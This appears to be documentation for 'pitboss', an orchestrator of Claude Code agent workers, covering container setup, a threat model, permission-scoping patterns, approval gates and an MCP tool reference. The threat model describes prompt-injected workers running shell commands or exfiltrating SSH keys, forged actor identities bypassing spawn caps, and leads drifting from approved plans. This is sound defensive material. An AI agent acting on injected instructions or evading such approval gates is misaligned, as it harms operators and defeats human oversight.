Option B: Persistent named volume

Run claude login inside the container once to authenticate via OAuth, store the result in a named volume, then reuse that volume for subsequent runs:

# One-time: interactive login inside a persistent volume
docker volume create pitboss-claude-auth
docker run --rm -it \
  -v pitboss-claude-auth:/home/pitboss/.claude \
  ghcr.io/sds-mode/pitboss-with-claude:latest \
  claude login

# Every run:
docker run --rm \
  -v pitboss-claude-auth:/home/pitboss/.claude \
  -v "$PWD/manifest.toml:/run/pitboss.toml:ro" \
  ghcr.io/sds-mode/pitboss-with-claude:latest \
  pitboss dispatch /run/pitboss.toml

Podman vs Docker

podman run and docker run with the arguments above behave equivalently for pitboss’s purposes. Key differences operators hit:

  • Rootless podman uses user namespaces → needs --userns=keep-id (see above).
  • Docker by default creates iptables rules that bypass UFW on Linux hosts. Podman’s netavark/slirp4netns stack respects the host firewall.
  • SELinux: both honor the :z / :Z mount flags identically.

Recommend podman for Linux operators who care about firewall enforcement; Docker is simpler for macOS (Docker Desktop) and Windows (WSL2 backend).

Updating the bundled Claude version

The bundled image pins a specific Claude Code version in CI. To consume a newer version:

  1. Open an issue or PR at https://github.com/SDS-Mode/pitboss to bump CLAUDE_CODE_VERSION in .github/workflows/container.yml.
  2. Once merged, a new container release rebuilds with the updated version.

For local/one-off use with a different version:

podman build --target=with-claude \
  --build-arg CLAUDE_CODE_VERSION=<version> \
  -t pitboss-with-claude:custom .

Troubleshooting

“Not logged in” / auth error

Check on the host: claude --version should work and ls ~/.claude/.credentials.json should exist. If the file is missing, run claude login on the host.

“Permission denied” reading credentials in rootless podman

Add --userns=keep-id. Rootless podman’s default UID namespace maps host UID to in-container UID 0 — see the “Why --userns=keep-id?” section.

“Permission denied (os error 13)” reading the manifest

The manifest bind mount is missing :z. Add it: -v "$PWD/manifest.toml:/run/pitboss.toml:ro,z". All bind mounts on SELinux-enforcing hosts need :z, not just ~/.claude.

SELinux AVC denials in the host audit log

Same cause as above — bind mounts need :z or :Z. :z applies a shared label (compatible across containers). :Z applies a private label (prevents other containers from reading the same mount).

Token refresh failure after a long-running dispatch

OAuth tokens rotate. If the container started with a valid token that expired mid-run, the refresh write-back needs UID alignment (--userns=keep-id on rootless podman, or matching -u on Docker). Re-run with the correct flag.

Threat model

This page frames pitboss’s attack surface honestly. It is aimed at operators evaluating whether pitboss fits a security-sensitive deployment, and at leads designed to process external content.


What pitboss is

Pitboss is an orchestrator. It:

  • Spawns claude subprocesses, one per worker or lead, with a specific prompt and tool set.
  • Captures their stream-JSON output, persists structured artifacts per run, and exposes a small MCP socket on a Unix domain socket.
  • In hierarchical mode, lets a lead dynamically spawn additional workers and sub-leads at runtime.

That is the complete list. Pitboss is not a sandbox, not a content filter, not an identity provider.


What pitboss is NOT

Not a runtime jail. If a worker is given Bash in its tools list, it can run arbitrary shell commands as the OS user that launched pitboss. Pitboss does not interpose on subprocess execution, does not apply seccomp profiles, and does not restrict filesystem access beyond what the OS already enforces.

Not an auth/identity provider. The MCP socket is unauthenticated. Pitboss assumes the only process connecting to the MCP socket is the claude subprocess it spawned. There is no per-request credential, no session token, no verification that the connecting client is the expected worker. Do not expose the MCP socket to other processes.

Not a content filter. Pitboss does not inspect what a worker reads, what it writes, or what it outputs. If a worker’s Bash call exfiltrates data to an external endpoint, pitboss will faithfully log the command in stdout.log after the fact — it will not prevent it.

Not an egress firewall. Pitboss makes no network-level restrictions on what the host or workers can contact. Workers with Bash or WebFetch can reach any endpoint reachable from the host.


Risks specific to LLM-orchestrated work

Prompt injection

A worker that reads external content — web pages, user-submitted documents, output from a previous worker that itself processed untrusted input — is exposed to prompt injection. Malicious content in that input can manipulate the worker’s subsequent behavior.

The severity depends on the worker’s tool set:

  • Read-only tools only — an injected instruction can cause the worker to produce a misleading report. The damage is informational.
  • Write or Edit tools — an injected instruction can cause the worker to modify files on the operator’s filesystem.
  • Bash — an injected instruction can cause the worker to run arbitrary shell commands. There is no pitboss-level defense against this. Mitigation is tool restriction: workers that process untrusted input should not have Bash.

Pitboss does not prevent prompt injection. The mitigation available to operators is scoping tool permissions so that a successfully injected worker cannot take state-changing actions. See The Rule of Two for the framework and Defense-in-depth patterns for concrete manifest recipes.

Runaway cost

A misbehaving lead — whether from a model error, a prompt-injected instruction, or a bug in the lead’s own prompt — can spawn workers continuously. The budget_usd and max_workers fields on [run] and per-sublead envelopes are the primary defense. Without them, cost is unbounded. The budget_usd cap is enforced via reservation accounting: spawn_worker fails before launch once spent + reserved + next_estimate > budget.

Capability escalation through chained tools

A worker with Read and Write can be tricked into discovering secrets in one location and writing them to another. A worker that reads ~/.ssh/id_rsa and writes to a world-readable output directory has effectively exfiltrated a key. The worker does not need Bash to do this — Read + Write is sufficient.

Tool restrictions should be designed with the worst-case injected instruction in mind, not the happy-path prompt.

Sensitive data exposure through observability paths

Workers emit stream-JSON to stdout. The TUI renders live log output per worker. If a worker’s output contains sensitive content (credentials it discovered, PII from files it read), that content may appear in:

  • tasks/<id>/stdout.log in the run directory
  • The TUI’s tile grid and log pane
  • Any webhook notification payloads if notifications are configured with include_output

Token and cost data is reported in stream-JSON for every worker. Operators should treat run directories as potentially sensitive artifacts.

Plan-to-action drift

When require_plan_approval = true, a lead must have a propose_plan approved before spawn_worker calls are permitted. However, the approval gates the plan text, not every subsequent action. The lead can behave differently when actually spawning workers than it described in the plan. Approval is a checkpoint, not a binding constraint. Operators who need tighter control over individual spawns should use request_approval calls before significant actions, not just propose_plan.


What is in your trust boundary

The following are inside your trust boundary as operator:

  • The claude binary and Anthropic’s API. Pitboss trusts the output of claude subprocesses to be honest (not itself adversarial).
  • The host you run pitboss on, including the filesystem, environment variables, and network stack.
  • The manifest you write. Pitboss executes it as specified; it does not attempt to validate that your prompts are safe.
  • Any HTTP endpoints configured in [notifications]. Pitboss will POST to them; ensure they are trusted and require no authentication that you’d rather not expose in the manifest.

Internal trust surfaces

Pitboss has two processes that talk to each other over an unauthenticated Unix domain socket:

  1. The dispatcher (pitboss dispatch). Holds run state, routes MCP tool calls to the correct layer, enforces policy.
  2. The MCP bridge (pitboss mcp-bridge <socket>). A small stdio↔socket adapter invoked by claude via --mcp-config. Stamps each incoming MCP request with a _meta field describing which actor (root lead, sub-lead, worker) originated it.

The dispatcher trusts the bridge’s _meta.actor_id and _meta.actor_role fields. These values are used as index keys into layer-routing maps (subleads, worker_layer_index) and as the basis for ActorPath on approval requests. This has two consequences:

If the bridge is compromised, actor identity is forgeable

An attacker with the ability to inject MCP requests over the dispatcher’s socket — or to replace the pitboss mcp-bridge binary before it starts — can stamp arbitrary actor_id / actor_role pairs. The dispatcher will route those requests as if they came from that actor. Concretely, a compromised bridge can:

  • Elevate a worker to a sub-lead. A worker-originated request stamped as actor_role = "sublead" bypasses the depth-2 spawn cap (workers are terminal; sub-leads can spawn more workers).
  • Cross-tree access. A sub-tree worker stamped with a peer sub-lead’s actor_id can read /peer/<peer>/* entries it is not supposed to see.
  • Approval redirection. Approval requests are routed by actor_path; a mislabeled approval will surface to the operator under the wrong originator, potentially misleading approve/reject decisions.

Mitigations currently in place

  • Socket permissions. The dispatcher creates the MCP socket with restrictive permissions (owner-only) in the run directory, which is typically under ~/.local/share/pitboss/runs/<run-id>/. Any process running as your host user can still connect; a process running as a different user cannot.
  • Role-shape validation. The dispatcher rejects syntactically invalid _meta payloads (e.g. actor_role = "sublead" without a matching registered actor_id), which closes some but not all misuse paths.
  • Worker-sent requests that target sub-lead-only tools are rejected regardless of _meta, because sub-lead-only tools are not in the worker’s --allowedTools list passed to the claude subprocess.

What is NOT mitigated

  • A bridge binary replaced on disk before the dispatcher invokes it. Verify the binary path you configure in any shared-tooling setup.
  • A local attacker with the same UID as the pitboss process. Pitboss assumes single-user-on-host; multi-tenant deployments require an external wrapper.

Planned hardening (tracked for a future phase)

  • Bridge-auth secret. A per-run secret the dispatcher generates, passes to the bridge at launch via a non-inherited channel, and requires the bridge to HMAC over _meta fields. Would cryptographically prevent forged identities from an unauthenticated connector even if an attacker reaches the socket.

Operators deploying pitboss in security-sensitive contexts should treat the bridge and dispatcher as a single trust unit and harden the host boundary (single-user host, restricted OS account, standard filesystem permissions on the runs directory) rather than relying on internal checks.


What pitboss does not provide (operator responsibilities)

GapOperator action
Egress filteringFirewall the host. Pitboss workers have full network access if Bash or WebFetch are allowed.
Per-tool-invocation audit logPitboss produces one TaskRecord per worker (in summary.jsonl), not a per-tool-call log. If you need a record of every Bash invocation, you need a wrapper or a Claude-level audit hook.
Argument validation on tool calls--allowedTools restricts which tools a worker may call, but not the arguments. A worker with Write can write to any path writable by the pitboss process user.
Secrets managementDo not put API keys or credentials in the manifest. Use env vars in [defaults].env or source them from the environment. The manifest is written verbatim to manifest.snapshot.toml in the run directory.
Identity / multi-tenancyPitboss assumes the operator is the only authenticated user. The MCP socket, TUI, and approval queue have no per-user access control. Multi-tenant deployments require an external wrapper.

Next: The Rule of Two — a framework for scoping worker tool permissions based on what each worker processes and touches.

The Rule of Two

The Rule of Two is a recognized pattern in AI agent design: an agent should hold AT MOST TWO of the following three properties at once:

  • (A) Untrusted input — the agent reads content that was not authored by the operator.
  • (B) Sensitive data access — the agent can read secrets, customer PII, internal-only documents, or anything the operator would not post publicly.
  • (C) State-changing actions — the agent can take actions that modify state outside its own conversation: writing files, running shell commands, calling external APIs, sending notifications.

Each pair has known failure modes. All three together is unsafe by default.

This page applies the Rule of Two to pitboss manifest design.


Defining the terms in pitboss context

Untrusted input is anything a worker reads that the operator did not author:

  • External documents or web pages retrieved via WebFetch
  • User-submitted content passed via the prompt or a shared-store entry
  • The output of another worker that itself processed untrusted input (injection can propagate through worker chains)
  • Files in a repository where external contributors have write access

Sensitive data is any information that should not be publicly visible:

  • Credentials and API keys (even if stored as env vars, a worker with Read could discover them if they’re also present in files)
  • Customer or user PII
  • Internal architecture documents, unreleased roadmap data, proprietary source code
  • Anything the operator would not include in a public bug report

State-changing actions in pitboss correspond to specific tool grants:

  • Write, Edit, NotebookEdit — modify files on the operator’s filesystem
  • Bash — run arbitrary shell commands (the broadest capability; subsumes most others)
  • Custom MCP tools that trigger external side effects (deploy pipelines, notification endpoints, databases)

Tool grants are set via the tools = [...] field on [defaults], [[task]], [[lead]], or in the spawn_worker call’s tools argument.


The three permitted pairs

PairWhat it meansKnown failure mode
A + C (untrusted input + state-changing, no sensitive data)Worker processes external content and can write output, but has no access to sensitive data.Injected instructions can corrupt output files or trigger external actions; they cannot read secrets.
B + C (sensitive data + state-changing, no untrusted input)Worker touches internal data and can act on it, but reads only operator-authored prompts and trusted internal data.Bugs or model errors can cause incorrect mutations; external injection is not a path because the worker never reads untrusted content.
A + B (untrusted input + sensitive data, no state-changing)Worker reads external content alongside internal data but cannot write or act.Can produce misleading reports if injected; cannot modify state. This is the lead-as-evaluator pattern.

A + C: untrusted input plus state-changing actions

Use this pair for workers that process external sources and write their output somewhere, but that do not need access to sensitive internal data.

[[task]]
id        = "scrape-and-summarize"
directory = "/output/public"
tools     = ["WebFetch", "Read", "Write", "Glob"]
prompt    = """
Fetch the URLs in urls.txt. Write a summary of each to summaries/.
Do not read files outside this directory.
"""

The worker can be injected, but an injected instruction can only write to the output directory and fetch URLs. It cannot read ~/.ssh/, env vars, or any file not under /output/public. Limit directory tightly and restrict Read to paths within it.

B + C: sensitive data plus state-changing actions

Use this pair for workers that act on internal data only — your own repository, your own credentials (passed via env), your own infrastructure. These workers must never read untrusted external content.

[[task]]
id        = "apply-refactor"
directory = "/internal/repo"
tools     = ["Read", "Write", "Edit", "Glob", "Grep"]
prompt    = """
Apply the refactor described in /internal/repo/PLAN.md.
Do not fetch external URLs or read paths outside this repository.
"""

There is no WebFetch or Bash here. The prompt is fully operator-authored. There is no external input path for injection. The risk is model error, not injection — which is mitigated by review (plan approval, approval-gated writes) rather than tool restriction.

A + B: untrusted input plus sensitive data (no state-changing)

This is the lead-as-evaluator pattern. A read-only lead (or worker) ingests external content and internal context simultaneously, but cannot act. Its output is a report or recommendation — the operator (or a separate write-capable worker) decides whether to act on it.

[[lead]]
id        = "evaluator"
directory = "/internal/repo"
tools     = ["Read", "Glob", "Grep"]
prompt    = """
Read the user-submitted PR description in /tmp/pr-body.txt.
Read the affected source files in this repo.
Produce a structured review report to stdout.
Do not spawn workers that have Write or Bash.
"""

No Write, Edit, or Bash. An injected instruction in pr-body.txt can only affect what the report says — it cannot modify the repository.


Wiring the Rule of Two in a pitboss manifest

Tool restrictions per worker

Set tools at [defaults] for a baseline, then tighten per-task or per-lead:

[defaults]
# Baseline: read-only
tools = ["Read", "Glob", "Grep"]

[[lead]]
id    = "root"
# The root lead only needs to read and coordinate
tools = ["Read", "Glob", "Grep"]

# Spawn workers with expanded tools only when explicitly needed:
# spawn_worker(prompt = "...", tools = ["Read", "Write", "Edit"])

The tools argument on spawn_worker overrides the per-task default for that worker. See Manifest schema for the field reference.

Sub-leads as isolation envelopes

A sub-lead’s budget_usd and max_workers cap what the sub-tree can consume, but isolation also comes from the KV layer boundary and read_down = false. Sub-leads with different Rule-of-Two profiles should not have read_down = true pointing at each other.

# Untrusted-input sub-tree: small budget, no read-down into trusted tree
spawn_sublead(
  prompt    = "Process the user-submitted documents in /tmp/uploads/...",
  budget_usd = 0.50,
  max_workers = 2,
  read_down  = false
)

Approval policy as a gate on state-changing tools

Use [[approval_policy]] to require operator review before any state-changing tool invocation. This does not prevent state changes — it gates them on explicit approval:

# Auto-approve reads; block anything that writes or runs commands
[[approval_policy]]
match  = { category = "tool_use", tool_name = "Read" }
action = "auto_approve"

[[approval_policy]]
match  = { category = "tool_use", tool_name = "Grep" }
action = "auto_approve"

[[approval_policy]]
match  = { category = "tool_use" }
action = "block"

See Defense-in-depth patterns → Approval-gated state-changing tools for a complete example.

The lead-as-evaluator pattern in detail

The lead-as-evaluator splits the A+B pair from the C property by using separate actors:

  1. Evaluator lead — holds A+B, no C. Reads external content + internal data, produces a structured plan. Tool set: ["Read", "Glob", "Grep"].
  2. Action worker — holds B+C, no A. Receives only the evaluator’s plan (operator-reviewed, operator-authored at the point of handoff). Tool set: ["Read", "Write", "Edit"] or ["Bash"].

The handoff goes through the operator approval queue. The evaluator’s propose_plan output is reviewed before any write-capable worker is spawned. See Defense-in-depth patterns for a runnable manifest.


Common violations and their consequences

ViolationConsequence
Giving Bash to a worker that reads user-submitted contentArbitrary shell execution on the host if the content contains an injected instruction
Passing secrets via the prompt or /ref/* to a worker that reads external URLsSecrets exfiltrated if the worker is injected
Running a depth-2 sub-lead with read_down = true that also processes untrusted inputRoot KV contents visible to an injected sub-tree
Not setting budget_usd on a hierarchical run that could receive externally-triggered workUnbounded cost if the lead is manipulated into spawning continuously

See also:

Defense-in-depth patterns

Each pattern below maps to a specific pitboss feature. For each one: what threat it addresses, a minimal manifest snippet, and what it does not cover.


1. Read-only lead, write-capable worker

Addresses: Prompt injection in the evaluation phase. The lead reads and reasons; workers act only after operator review.

This is the lead-as-evaluator pattern from The Rule of Two. The lead holds (A+B) — it may read untrusted content alongside internal data — but has no Write, Edit, or Bash. Workers hold (B+C) but receive only an operator-reviewed plan.

[run]
max_workers          = 4
budget_usd           = 5.00
require_plan_approval = true

[[lead]]
id        = "evaluator"
directory = "/repo"
tools     = ["Read", "Glob", "Grep"]
prompt    = """
Read the user-submitted spec in /tmp/spec.md and the existing codebase.
Produce a plan via propose_plan listing every file to change and why.
Do not spawn workers until the plan is approved.
"""

When the lead calls propose_plan, the TUI surfaces it for operator review. Only after the operator approves does spawn_worker become permitted. The operator can reject with a reason, and the lead can revise.

Workers are spawned with explicit tool grants at spawn time:

# Example lead prompt continues:
# spawn_worker(
#   prompt = "Implement the plan. Write only to the paths listed.",
#   tools  = ["Read", "Write", "Edit", "Glob", "Grep"]
# )

What this does not cover: The operator approves the plan text, not every individual write. A worker that implements the approved plan can still make incorrect edits within that scope. Use per-write request_approval calls (pattern 3) if you need individual write approval.


2. Untrusted input quarantine via sub-leads

Addresses: Prompt injection in an externally-sourced sub-task propagating to the rest of the run.

A sub-lead that processes untrusted external content is given a bounded envelope and strict KV isolation. Its workers have no Write or Bash. Findings return only through Event::Result — the root lead reads the result, decides what (if anything) to do with it.

[run]
max_workers    = 8
budget_usd     = 10.00
lead_timeout_secs = 3600

[[lead]]
id              = "root"
allow_subleads  = true
max_subleads    = 3
directory       = "/repo"
tools           = ["Read", "Glob", "Grep"]
prompt          = """
For each URL in /tmp/urls.txt, spawn a sub-lead to fetch and summarize it.
Use budget_usd = 0.50 and max_workers = 2 per sub-lead.
Set read_down = false on each sub-lead.
After all sub-leads finish, read their terminal results and produce a
combined report. Do not pass any sub-lead's raw output directly to another.
"""

[lead.sublead_defaults]
budget_usd        = 0.50
max_workers       = 2
lead_timeout_secs = 300
read_down         = false

Each sub-lead spawned for external URLs gets:

  • budget_usd = 0.50 — cost cap per external document
  • read_down = false — the root lead cannot see the sub-lead’s KV store, so a sub-lead cannot smuggle injected data into /ref/* that root then acts on
  • Workers with read-only tools only (configured by the sub-lead’s own prompt)

The sub-lead’s workers might have:

# Sub-lead spawns workers like:
# spawn_worker(
#   prompt = "Fetch the URL and write a 3-bullet summary. Nothing else.",
#   tools  = ["WebFetch", "Read"]
# )

What this does not cover: The sub-lead’s Event::Result text is itself untrusted output — an injected worker could craft a malicious result. The root lead that reads results is read-only, so injected result content can affect the root’s report but not cause write actions directly. Apply pattern 3 or pattern 1 on top if root needs to act on the results.


3. Approval-gated state-changing tools

Addresses: Unreviewed file writes or shell commands. Every state-changing tool invocation surfaces to the operator before executing.

Use [[approval_policy]] to auto-approve cheap read operations and block all writes and shell invocations:

[run]
max_workers     = 4
budget_usd      = 8.00
approval_policy = "block"

# Auto-approve reads (high volume, low risk)
[[approval_policy]]
match  = { category = "tool_use", tool_name = "Read" }
action = "auto_approve"

[[approval_policy]]
match  = { category = "tool_use", tool_name = "Glob" }
action = "auto_approve"

[[approval_policy]]
match  = { category = "tool_use", tool_name = "Grep" }
action = "auto_approve"

# Block all other tool-use (Write, Edit, Bash, etc.) for operator review
[[approval_policy]]
match  = { category = "tool_use" }
action = "block"

Rules are evaluated first-match-wins. Read, Glob, and Grep are auto-approved. Any other tool-use — including Write, Edit, Bash, and any custom MCP tool — blocks for operator review.

What this does not cover: [[approval_policy]] is not argument-aware. It gates whether Write is invoked, not which path the Write targets. Combine with tight directory scoping and read-only leads (pattern 1) for path-level control.

See Approvals for the full policy model.


4. Cost firewall via per-sub-lead envelopes

Addresses: A prompt-injected sub-tree spawning unbounded workers and consuming unbounded budget.

Each sub-lead spawned for externally-triggered work gets a budget cap enforced at the dispatcher level. Even if the sub-lead is injected with an instruction to spawn 100 workers, the envelope enforces the cap before any worker is launched.

[run]
max_workers    = 20
budget_usd     = 50.00
lead_timeout_secs = 7200

[[lead]]
id                     = "root"
allow_subleads         = true
max_subleads           = 10
max_sublead_budget_usd = 1.00   # hard cap: no sub-lead can get more than $1
max_workers_across_tree = 16
directory              = "/repo"
prompt                 = """
For each incoming task in /tmp/queue.json, spawn a sub-lead with
budget_usd = 0.50, max_workers = 2, read_down = false.
"""

[lead.sublead_defaults]
budget_usd        = 0.50
max_workers       = 2
lead_timeout_secs = 600
read_down         = false

max_sublead_budget_usd = 1.00 means a root lead cannot grant a sub-lead more than $1.00 even if it tries. The [lead.sublead_defaults] sets the default to $0.50. The combination caps per-task cost at $0.50 with a hard ceiling of $1.00.

When a sub-lead hits its budget_usd ceiling, spawn_worker returns budget exceeded and the sub-lead terminates (or handles the error, if its prompt instructs it to). The root lead receives the sub-lead’s terminal result and can decide whether to alert.

Configure [notifications] with budget_alert_threshold_pct to receive a webhook when any actor reaches a configured percentage of its budget.

What this does not cover: Budget caps do not prevent a sub-lead from using its full envelope on a single expensive operation. They cap total spend, not per-operation cost.


5. Run-global lease as serialization gate

Addresses: Multiple agents concurrently modifying a sensitive shared resource (a deploy pipeline, a credential store, a shared output file) and corrupting it through interleaved writes.

Require a run-global lease before any agent touches the shared resource. Only one agent at a time holds the lease; the rest wait or fail fast. The lease auto-releases if the holder crashes, so a dead agent cannot hold the lock indefinitely.

[run]
max_workers  = 8
budget_usd   = 20.00

[[lead]]
id        = "root"
directory = "/deploy"
allow_subleads = true
prompt    = """
For each service in services.txt:
  1. Call run_lease_acquire("deploy.lock", ttl_secs=300) — wait up to 60s.
  2. Perform the deploy steps.
  3. Call run_lease_release(lease_id).
If acquire times out, report the service as skipped and continue.
"""

The ttl_secs = 300 ensures that if the deploy worker crashes mid-deploy, the lease expires after 5 minutes and the next actor can proceed. Do not set ttl_secs longer than the maximum acceptable stall duration.

run_lease_acquire is the run-global variant. For resources internal to a single sub-tree, use lease_acquire instead. See Leases & coordination for when to use each.

What this does not cover: Leases serialize access but do not validate what the holder does during the lease. A holder that writes corrupt data will not be detected by the lease mechanism. Combine with plan approval (pattern 1) for write validation.


6. TTL + auto-reject fallback

Addresses: An approval that the operator cannot reach (off-hours, disconnected TUI, operational incident) stalling the run indefinitely — and then being approved automatically when the operator reconnects without reviewing the context.

Set a TTL on approval requests. When the TTL expires without a response, fallback = "auto_reject" causes the request to be rejected rather than queued for later approval.

[run]
max_workers     = 4
budget_usd      = 10.00
# Default: block approvals if no TUI connected
approval_policy = "block"

The lead’s prompt instructs it to pass a TTL on sensitive requests:

# In the lead's prompt:
# request_approval(
#   summary    = "About to run the deploy script for prod.",
#   timeout_secs = 300,
#   plan = {
#     summary  = "Run deploy.sh in /deploy/prod",
#     risks    = ["Deploys to production; irreversible without rollback procedure"],
#     rollback = "Run deploy.sh --rollback"
#   }
# )
#
# The lead prompt should handle rejection:
# If rejected or timed out, abort this task and report why.

To set a run-level fallback on all approval requests, combine the TTL with [[approval_policy]]:

# Block all approvals; set a cost-over firewall for large events
[[approval_policy]]
match  = { category = "cost", cost_over = 1.00 }
action = "block"

Operator-side: if you expect off-hours runs where the TUI may be unattended, set approval_policy = "auto_reject" in [run] as the baseline. Approvals that aren’t explicitly auto-approved by a policy rule will reject rather than queue indefinitely.

What this does not cover: Auto-reject stops the action but does not roll back work already done. For actions that should be atomic (approve before any work or none), use propose_plan with require_plan_approval = true before any workers are spawned.


What you still need to provide

These are operator responsibilities that pitboss does not address:

Egress filtering. Firewall the host. Workers with Bash or WebFetch can reach any endpoint reachable from the OS. Pitboss makes no network-level restrictions.

Secrets handling. Do not put API keys or credentials in the manifest. Use [defaults].env to pass secrets from the environment, or use a secrets manager. The manifest is written verbatim to manifest.snapshot.toml in the run directory.

Per-tool-invocation audit log. Pitboss produces one TaskRecord per worker (summary.jsonl), not a per-tool-call log. If you need a record of every Bash invocation or every path written to, you need a process-level audit hook or a claude-level wrapper.

Identity and access control. Pitboss assumes the operator is the only user. The MCP socket, TUI, and approval queue have no per-user access control. Multi-tenant deployments require an external wrapper.


See also:

MCP Tool Reference — Overview

In hierarchical mode, pitboss starts an MCP server on a unix socket and auto-generates an --mcp-config for the lead’s claude subprocess. All tools in this reference are automatically added to the lead’s --allowedTools list — the operator does not list them explicitly.

Workers get a narrower toolset (shared-store tools only; no spawn_worker, no spawn_sublead).

Tool categories

CategoryPageWho can call
Session controlSession controlLead only (root lead)
Coordination & stateCoordination & stateLead + workers
ApprovalsApprovalsLead only

MCP tool name prefix

All pitboss tools are prefixed mcp__pitboss__. In prompts and --allowedTools lists, use the full name:

mcp__pitboss__spawn_worker
mcp__pitboss__kv_get
mcp__pitboss__request_approval

Structured content wrapper

All tool responses are wrapped in a record ({ entry: ... }, { entries: [...] }, { workers: [...] }, etc.). Claude Code’s MCP client requires structuredContent to be a record, not a bare array or null. Unwrap one level when reading results in a lead prompt.

The bridge

Claude Code’s MCP client speaks stdio. The pitboss MCP server listens on a unix socket. Between them is pitboss mcp-bridge <socket> — a stdio-to-socket proxy auto-launched via the lead’s generated --mcp-config. You never invoke it directly.

Error patterns

ErrorMeaningRecovery
budget exceeded: $X spent + $Y reserved + $Z estimated > $B budgetNot enough budget headroom to spawnFinish existing work; surface to operator if needed
worker cap reached: N active (max M)Too many live workersWait for one to finish via wait_for_worker or wait_for_any
run is draining: no new workers acceptedOperator Ctrl-C’d or lead was cancelledFinish gracefully; don’t spawn new work
unknown task_idTypo or referring to an unspawned workerCall list_workers to see what’s registered
SpawnFailedWorker never started (worktree prep failure, branch conflict, non-git directory)Check stderr log
plan approval required: call propose_plan ...require_plan_approval = true and no approved plan yetCall propose_plan and wait for approval

Full canonical reference

AGENTS.md in the source tree is the authoritative machine-readable reference for all tool schemas. The pages in this section derive from it and highlight the most important fields for human readers. If anything here conflicts with the binary’s actual behavior, the binary wins — file a PR against this book.

Session control tools

These tools are available to the root lead only. Sub-lead leads can call spawn_worker (for their own workers) but not spawn_sublead (depth-2 cap enforced at both the MCP handler and the sub-lead’s --allowedTools).


spawn_worker

Spawn a new worker subprocess with a given prompt.

Args:

{
  "prompt": "string (required)",
  "directory": "string (optional, defaults to lead's directory)",
  "branch": "string (optional, auto-generated if omitted)",
  "tools": ["string"] ,
  "timeout_secs": 600,
  "model": "claude-haiku-4-5"
}

Returns: { "task_id": "string", "worktree_path": "string or null" }

Rules:

  • prompt is required.
  • directory defaults to the lead’s directory.
  • model defaults to the lead’s model. Override per-worker when you need a heavier worker (Sonnet or Opus) under a Haiku lead.
  • tools defaults to the lead’s tools.
  • Fails with budget exceeded if spent + reserved + next_estimate > budget_usd.
  • Fails with worker cap reached if the number of live workers equals max_workers.
  • Fails with plan approval required if require_plan_approval = true and no plan has been approved yet.

spawn_sublead (v0.6+, root lead only)

Spawn a sub-lead with its own Claude session, budget envelope, and isolated coordination layer.

Args:

{
  "prompt": "string (required)",
  "model": "string (required)",
  "budget_usd": 2.00,
  "max_workers": 4,
  "lead_timeout_secs": 1800,
  "initial_ref": { "key": "value" },
  "read_down": false
}

Returns: { "sublead_id": "string" }

  • Available only when allow_subleads = true in the manifest.
  • budget_usd and max_workers are required unless read_down = true.
  • initial_ref seeds the sub-lead’s /ref/* namespace at spawn time.
  • Fails if budget_usd > max_sublead_budget_usd (manifest cap enforcement, pre-state).

wait_actor (v0.6+)

Wait for any actor (worker or sub-lead) to settle. Generalizes wait_for_worker.

Args: { "actor_id": "string", "timeout_secs": 120 }

Returns: ActorTerminalRecord — either { "Worker": TaskRecord } or { "Sublead": SubleadTerminalRecord } depending on actor type.

wait_for_worker is retained as a back-compat alias; it unwraps the Worker variant.


wait_for_worker

Block until a specific worker settles (back-compat alias for wait_actor on worker ids).

Args: { "task_id": "string", "timeout_secs": 120 }

Returns: Full TaskRecord when the worker settles.


wait_for_any

Block until the first of a list of workers settles.

Args: { "task_ids": ["string"], "timeout_secs": 120 }

Returns: { "task_id": "string", "record": TaskRecord } — the first to finish.


worker_status

Non-blocking peek at a worker’s current state.

Args: { "task_id": "string" }

Returns: { "state": "Running|Paused|Frozen|Done|...", "started_at": "...", "partial_usage": {...}, "last_text_preview": "...", "prompt_preview": "..." }


list_workers

Snapshot of all active and completed workers.

Args: {}

Returns: { "workers": [{ "task_id": "string", "state": "...", "prompt_preview": "...", "started_at": "..." }, ...] }


cancel_worker

Signal a worker’s cancel token, terminating the subprocess.

Args: { "task_id": "string", "reason": "optional string" }

Returns: { "ok": true }

When reason is supplied, a synthetic [SYSTEM] reprompt is delivered to the killed actor’s direct parent lead. This lets the parent adapt without a separate reprompt_worker call.


pause_worker

Pause a running worker. Two modes:

modeBehavior
"cancel" (default)Terminate the subprocess + snapshot claude_session_id. continue_worker spawns claude --resume. Zero context loss on Anthropic’s side; some reload cost on resume.
"freeze" (v0.5+)SIGSTOP the subprocess in place. continue_worker sends SIGCONT. No state loss at all, but long freezes risk Anthropic dropping the HTTP session — use for short pauses only.

Args: { "task_id": "string", "mode": "cancel|freeze" }

Returns: { "ok": true }

Fails if the worker is not in Running state with an initialized session.


continue_worker

Resume a paused or frozen worker.

Args: { "task_id": "string", "prompt": "optional string" }

Returns: { "ok": true }

  • For paused (cancel-mode) workers: spawns claude --resume <session_id>. Optional prompt is added to the resume.
  • For frozen workers: sends SIGCONT. prompt is ignored for frozen workers — use reprompt_worker after continue if you want to redirect.

reprompt_worker

Mid-flight course correction: terminate and restart a worker with a new prompt, preserving the claude session via --resume.

Args: { "task_id": "string", "prompt": "string (required)" }

Returns: { "ok": true }

Differs from pause_worker + continue_worker in that the new prompt replaces the worker’s current direction rather than resuming it. Use when a worker has gone off-track and you want to give it an explicit correction.

Coordination & state tools

These tools are available to both leads and workers (though with different access levels depending on the namespace). They operate on the current layer’s in-memory KV store.

For guidance on when to use /leases/* (per-layer) vs run_lease_acquire (run-global), see Lease scope selection.


KV namespaces recap

NamespaceLead can writeWorker can writeNotes
/ref/*YesNoLead-authored shared context for all workers
/peer/<id>/*Yes (any actor)Only own pathPer-worker output slots
/peer/self/*YesYesAlias resolving to caller’s actor id
/shared/*YesYesLoose cross-worker coordination
/leases/*ManagedManagedVia lease_acquire / lease_release only

kv_get

Read a single entry.

Args: { "path": "/ref/config" }

Returns: { "entry": { "path": "...", "value": "bytes", "version": 1, "updated_at": "..." } | null }

Returns null in the entry field if the path does not exist (wrapped in a record per MCP spec).


kv_set

Write a value to a path. Increments the version on each write.

Args:

{
  "path": "/shared/findings/my-result",
  "value": "bytes (UTF-8 string or base64)",
  "override_flag": false
}

Returns: { "version": 2 }

  • Workers can only write to their own /peer/<self>/* or /shared/*. Writing to another worker’s /peer/<X>/* returns Forbidden.
  • override_flag — reserved; currently unused.

kv_cas

Compare-and-swap: write only if the current version matches.

Args:

{
  "path": "/shared/counter",
  "expected_version": 3,
  "new_value": "bytes",
  "override_flag": false
}

Returns: { "version": 4, "swapped": true }

  • swapped: false means the version didn’t match; the write was not applied.
  • Use kv_cas when multiple workers might write the same path to avoid lost updates.

kv_list

List entries matching a glob pattern.

Args: { "glob": "/shared/findings/*" }

